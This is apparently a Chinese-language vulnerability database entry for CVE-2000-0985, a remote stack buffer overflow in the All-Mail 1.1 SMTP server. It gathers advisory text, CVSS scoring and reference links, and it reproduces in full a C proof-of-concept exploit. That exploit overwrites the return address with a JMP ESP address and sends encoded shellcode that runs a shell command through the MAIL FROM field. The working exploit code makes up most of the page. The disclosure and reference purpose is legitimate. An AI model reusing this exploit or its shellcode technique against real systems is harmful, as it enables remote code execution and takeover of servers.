CVE-2000-0985
CVSS10.0
发布时间 :2000-12-19 00:00:00
修订时间 :2008-09-05 16:22:21
NMCOES    

[原文]Buffer overflow in All-Mail 1.1 allows remote attackers to execute arbitrary commands via a long "MAIL FROM" or "RCPT TO" command.


[CNNVD]All-Mail缓冲区溢出漏洞(CNNVD-200012-147)

        All-Mail 1.1版本存在缓冲区溢出漏洞。远程攻击者借助超长"MAIL FROM"或者"RCPT TO"命令执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0985
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0985
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-147
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1789
(VENDOR_ADVISORY)  BID  1789
http://www.atstake.com/research/advisories/2000/a101200-2.txt
(VENDOR_ADVISORY)  ATSTAKE  A101200-2

- 漏洞信息

All-Mail缓冲区溢出漏洞
危急 缓冲区溢出
2000-12-19 00:00:00 2005-10-20 00:00:00
远程  
        All-Mail 1.1版本存在缓冲区溢出漏洞。远程攻击者借助超长"MAIL FROM"或者"RCPT TO"命令执行任意命令。

- 公告与补丁

        Nevis Systems is aware of this vulnerability but reportedly does not support the product anymore. Users are advised to use another mail package.

- 漏洞信息 (20287)

Nevis Systems All-Mail 1.1 Buffer Overflow Vulnerability (EDBID:20287)
windows remote
2000-10-10 Verified
0 @stake
N/A [点击下载]
source: http://www.securityfocus.com/bid/1789/info

All-mail is an smtp server for Windows NT and 2000 platforms offered by Nevis Systems. It is vulnerable to remotely exploitable buffer overflow attacks that may lead to an attacker gaining control of the victim host. 

The condition is known to occur in at least two places. The values supplied by the user that argument the "mail from" and "rcpt to" smtp commands are stored in buffers of predefined length. It is not verified that the amount data is within the predefined size limits before it is copied onto the stack during function calls. Consequently it is possible for users to overwrite stack variables (with the excessive data..) such as the calling function's return address with arbitrary values that can alter the program's flow of execution. 

If exploited, the user can at the very least cause the smtp server to crash. More advanced attacks can result in arbitrary code execution on the victim host.


#include <windows.h>
#include <winsock.h>
#include <string.h>
#include <stdio.h>

struct sockaddr_in sa;
struct hostent *he;
SOCKET sock;
char hostname[256]="";

int main(int argc, char *argv[])
{
	int chk=0,count=0;
	char
buffer[500]="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPP
PQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ11112222333344445555666677778888999
90000aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrr
rssssttttuuuuvvvvwwwwxxxxyy";
	
	if(argc == 1)
		{
			printf("\n\tUsage: C:\\>%s host\n\tTests for
All-Mail buffer overflow\n\tDavid Litchfield 10th October
2000\n\n",argv[0]);
			return 0;
		}

	strncpy(hostname,argv[1],250);

	// Overwrite the saved return address with 0x77F32836
	// This address contains a JMP ESP instruction that
	// when executed will land us back in our buffer

	buffer[242]=0x36;
	buffer[243]=0x28;
	buffer[244]=0xF3;
	buffer[245]=0x77;

	count = 246;

	// This part of the buffer gets zapped - just put NOPs in

	buffer[count++]=0x90;
	buffer[count++]=0x90;
	buffer[count++]=0x90;
	buffer[count++]=0x90;
	buffer[count++]=0x90;
	buffer[count++]=0x90;
	buffer[count++]=0x90;
	buffer[count++]=0x90;
	buffer[count++]=0x90;


	// This is where our code starts in earnest

	// mov esp,ebp
	buffer[count++]=0x8B;
	buffer[count++]=0xEC;

	// With our stack perserved and our code safe we continue

	// mov ebx,esp
	buffer[count++]=0x8B;
	buffer[count++]=0xDC;

	// mov eax,77F1A986h
	buffer[count++]=0xB8;
	buffer[count++]=0x86;
	buffer[count++]=0xA9;
	buffer[count++]=0xF1;
	buffer[count++]=0x77;

	// xor esi,esi
	buffer[count++]=0x33;
	buffer[count++]=0xF6;

	// push esi
	buffer[count++]=0x56;

	// mov ecx, 0xFFFFFFFF
	buffer[count++]=0xB9;
	buffer[count++]=0xFF;
	buffer[count++]=0xFF;
	buffer[count++]=0xFF;
	buffer[count++]=0xFF;

	// sub ecx, 0x0D7
	buffer[count++]=0x83;
	buffer[count++]=0xE9;
	buffer[count++]=0xD7;

	// loophere:

	// sub dword ptr[ebx+0x50],1
	buffer[count++]=0x83;
	buffer[count++]=0x6B;
	buffer[count++]=0x50;
	buffer[count++]=0x01;

	// sub ebx,1
	buffer[count++]=0x83;
	buffer[count++]=0xEB;
	buffer[count++]=0x01;

	// sub ecx,1
	buffer[count++]=0x83;
	buffer[count++]=0xE9;
	buffer[count++]=0x01;

	// test ecx,ecx
	buffer[count++]=0x85;
	buffer[count++]=0xC9;

	// jne loophere
	buffer[count++]=0x75;
	buffer[count++]=0xF2;

	// add ebx,0x55
	buffer[count++]=0x83;
	buffer[count++]=0xC3;
	buffer[count++]=0x55;

	// push ebx	
	buffer[count++]=0x53;

	// call eax
	buffer[count++]=0xFF;
	buffer[count++]=0xD0;

	// This bunch is our command to run:
	// cmd.exe /c dir > allmail_orun.txt
	// but with 1 added to evey character
	// which is SUBed in the loop above
	buffer[count++]=0x01;
	buffer[count++]=0x01;
	buffer[count++]=0x01;
	buffer[count++]=0x01;
	buffer[count++]=0x64;
	buffer[count++]=0x6e;
	buffer[count++]=0x65;
	buffer[count++]=0x2f;
	buffer[count++]=0x66;
	buffer[count++]=0x79;
	buffer[count++]=0x66;
	buffer[count++]=0x21;
	buffer[count++]=0x30;
	buffer[count++]=0x64;
	buffer[count++]=0x21;
	buffer[count++]=0x65;
	buffer[count++]=0x6a;
	buffer[count++]=0x73;
	buffer[count++]=0x21;
	buffer[count++]=0x3f;
	buffer[count++]=0x21;
	buffer[count++]=0x62;
	buffer[count++]=0x6d;
	buffer[count++]=0x6d;
	buffer[count++]=0x6e;
	buffer[count++]=0x62;
	buffer[count++]=0x6a;
	buffer[count++]=0x6d;
	buffer[count++]=0x60;
	buffer[count++]=0x70;
	buffer[count++]=0x73;
	buffer[count++]=0x76;
	buffer[count++]=0x6f;
	buffer[count++]=0x2f;
	buffer[count++]=0x75;
	buffer[count++]=0x79;
	buffer[count++]=0x75;
	buffer[count++]=0x01;
	buffer[count++]=0x01;
	buffer[count++]=0x01;
	

	if(startWSOCK(hostname)!=0)
		{
			printf("Winsock Error!\n");
			return 0;
		}

	DoBufferOverrun(buffer);

	return 0;

}	



int startWSOCK(char *swhost)
{
	int err=0;
	WORD wVersionRequested;
	WSADATA wsaData;

	wVersionRequested = MAKEWORD( 2, 0 );
	err = WSAStartup( wVersionRequested, &wsaData );
	if ( err != 0 )
		{
			
			return 2;
		}
	if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion )
!= 0 )
		{
   	 		WSACleanup( );
    			return 3;
		}

	if ((he = gethostbyname(swhost)) == NULL)
		{
			printf("Host not found..");
			return 4;
		}
	sa.sin_addr.s_addr=INADDR_ANY;
	sa.sin_family=AF_INET;
	memcpy(&sa.sin_addr,he->h_addr,he->h_length);

	return 0;
}	

int DoBufferOverrun(char *exploit)
{
	
	int snd, rcv, err, count =0,incount = 0;	
	char resp[200],*loc=NULL;

	sa.sin_port=htons(25);
	sock=socket(AF_INET,SOCK_STREAM,0);
	bind(sock,(struct sockaddr *)&sa,sizeof(sa));
	if (sock==INVALID_SOCKET)
		{
			closesocket(sock);
			return 0;
		}

	if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
		{

			closesocket(sock);
			printf("Failed to connect\n");
			return 0;
		}
	else
		{
			rcv = recv(sock,resp,200,0);
			snd = send(sock,"helo
all-mail.overrun.test\r\n",28,0);
			rcv = recv(sock,resp,200,0);
			loc = strstr(resp,"250 HELO accepted");
			if(loc == NULL)
				{
					printf("Server does not appear to be
running All-Mail\nAborting...");
					closesocket(sock);
					return 0;
				}
			else
				{
					snd = send(sock,"mail from:
<",12,0);
					snd =
send(sock,exploit,strlen(exploit),0);
					snd = send(sock,">\r\n",3,0);
					printf("Payload
sent...allmail_orun.txt should have been created.\n");
				}
		}

closesocket(sock);
return 0;
}
		

- 漏洞信息

7155
All-Mail MAIL FROM Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-10-12 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

All-Mail Buffer Overflow Vulnerability
Boundary Condition Error 1789
Yes No
2000-10-12 12:00:00 2009-07-11 03:56:00
Discovered by @stake and published in an @stake security advisory released on Oct 12, 2000.

- 受影响的程序版本

Nevis Systems All-Mail 1.1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0

- 漏洞讨论

All-mail is an smtp server for Windows NT and 2000 platforms offered by Nevis Systems. It is vulnerable to remotely exploitable buffer overflow attacks that may lead to an attacker gaining control of the victim host.

The condition is known to occur in at least two places. The values supplied by the user that argument the "mail from" and "rcpt to" smtp commands are stored in buffers of predefined length. It is not verified that the amount data is within the predefined size limits before it is copied onto the stack during function calls. Consequently it is possible for users to overwrite stack variables (with the excessive data..) such as the calling function's return address with arbitrary values that can alter the program's flow of execution.

If exploited, the user can at the very least cause the smtp server to crash. More advanced attacks can result in arbitrary code execution on the victim host.

- 漏洞利用

A sample exploit was included in the advisory, linked to below:

- 解决方案

Nevis Systems is aware of this vulnerability but reportedly does not support the product anymore. Users are advised to use another mail package.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站